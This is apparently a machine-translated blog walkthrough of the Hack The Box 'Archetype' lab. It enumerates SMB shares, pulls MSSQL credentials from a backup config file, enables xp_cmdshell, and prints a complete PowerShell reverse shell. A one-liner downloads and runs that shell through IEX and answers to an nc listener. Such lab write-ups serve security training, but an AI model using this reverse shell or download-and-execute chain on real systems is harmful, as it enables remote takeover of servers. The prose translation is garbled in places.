SMB+MSSQL

routine nmap Scan target IP, Get which port numbers are open and which services , You can see SMB Agreed 1433 Port number open , Along with MySQL Service for .

utilize SMB Medium smbclient Tools remotely connect and enumerate ：

smbclient -N -L \\\\{TARGET_IP}\\    #-N：no password ,-L: The service found is applicable on the server side .

For a group of share, After testing ,ADMIN$ and C$ Can't be accessed , Because you can only access backups Catalog , Enumerate... According to the following command backups：

smbclient -N \\\\{TARGET_IP}\\backups

  The following figure shows SMB Remote connection target IP, View directory , Download profile , And exit , I. whole process .

  View the contents of the configuration file （ Key content ： Password and user information ）：

  password ：M3g4c0rp123, user ：ARCHETYPE\sql_svc

According to the information provided , Need to use a tool to connect MSSQL The server , Use here impacket Tools .

Impacket Is used to handle network protocols Python Class set .Impacket Focus on providing low-level programming access to packets , For some agreements （ Such as SMB1-3 and MSRPC）, Provide the protocol implementation itself . Packets can be constructed from scratch , It can also be parsed from the original data , And object-oriented API Make it easy to use the deep protocol hierarchy . The library provides a set of tools , As an example of operations that can be performed in the context of the library .

About how he installed , There is no superfluous explanation here . Connect directly from the command line MSSQL：

target_IP The front is the user , After that, you will enter the password in the previous configuration file .

python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth

  First , We need to confirm whether the connected object is in the service ：

SELECT is_srvrolemember('sysadmin');

  Set related commands , You need to make it possible to execute... In this connection mode cmd command .

  Set up the success ：

  Come here , We have preliminarily obtained shell 了 .

Persistence shell

SQL Server Of shel It's a little thin , Since it is Windows, Then try using Powershell Script 、nc monitor Make a persistent connection .

First line IP Fill in the initial Kali IP, Pay attention to network segment

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.226",443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "# ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()

Save it to kali The desktop of the , The name is shell.ps1

After use python Start a server , So that the target can access the script 、 Download script , The server starts on the desktop , and shell.ps1 In the same folder

python3 -m http.server 80

Make sure you have access to the script when you play

nc Start a monitor for shell Interaction , The port is the same as the one set above 443

nc -lvnp 443

  return mssqlclient, Let the target access 、 download 、 Run script , Empathy xxx yes Kali IP

mssqlclient.py ARCHETYPE/[email protected] -windows-auth
SQL \> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.xxx/shell.ps1\");"

If you successfully connect to the other two windows, you can successfully see the listening host ,

 

 

 

 『Hack The Box』Archetype

『Hack The Box』Archetype_Ho1aAs The blog of -CSDN Blog